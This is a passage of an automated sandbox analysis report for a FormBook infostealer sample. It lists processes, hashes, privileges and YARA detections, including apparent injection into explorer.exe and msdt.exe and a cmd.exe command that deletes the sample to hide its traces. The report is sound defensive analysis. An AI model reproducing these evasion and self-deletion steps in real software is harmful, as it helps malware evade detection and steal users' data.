                                                                                          MD5 hash:F41951980D050C8FE13C8A2E31E55B94
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.220966733.00000000042E9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.220966733.00000000042E9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.220966733.00000000042E9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          Reputation:low

                                                                                          General

                                                                                          Start time:19:12:28
                                                                                          Start date:10/06/2021
                                                                                          Path:C:\Users\user\Desktop\DNPr7t0GMY.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Users\user\Desktop\DNPr7t0GMY.exe
                                                                                          Imagebase:0x4f0000
                                                                                          File size:1325568 bytes
                                                                                          MD5 hash:F41951980D050C8FE13C8A2E31E55B94
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.216484865.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.216484865.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.216484865.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.271551704.0000000000CF0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.271551704.0000000000CF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.271551704.0000000000CF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.271485121.0000000000CC0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.271485121.0000000000CC0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.271485121.0000000000CC0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          Reputation:low

                                                                                          General

                                                                                          Start time:19:12:31
                                                                                          Start date:10/06/2021
                                                                                          Path:C:\Windows\explorer.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:
                                                                                          Imagebase:0x7ff714890000
                                                                                          File size:3933184 bytes
                                                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          General

                                                                                          Start time:19:12:51
                                                                                          Start date:10/06/2021
                                                                                          Path:C:\Windows\SysWOW64\msdt.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\SysWOW64\msdt.exe
                                                                                          Imagebase:0x11e0000
                                                                                          File size:1508352 bytes
                                                                                          MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.478198621.0000000000C50000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.478198621.0000000000C50000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.478198621.0000000000C50000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.478065429.0000000000C20000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.478065429.0000000000C20000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.478065429.0000000000C20000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          Reputation:moderate

                                                                                          General

                                                                                          Start time:19:12:55
                                                                                          Start date:10/06/2021
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:/c del 'C:\Users\user\Desktop\DNPr7t0GMY.exe'
                                                                                          Imagebase:0xb40000
                                                                                          File size:232960 bytes
                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          General

                                                                                          Start time:19:12:56
                                                                                          Start date:10/06/2021
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6b2800000
                                                                                          File size:625664 bytes
                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          Disassembly

                                                                                          Code Analysis

                                                                                          Reset < >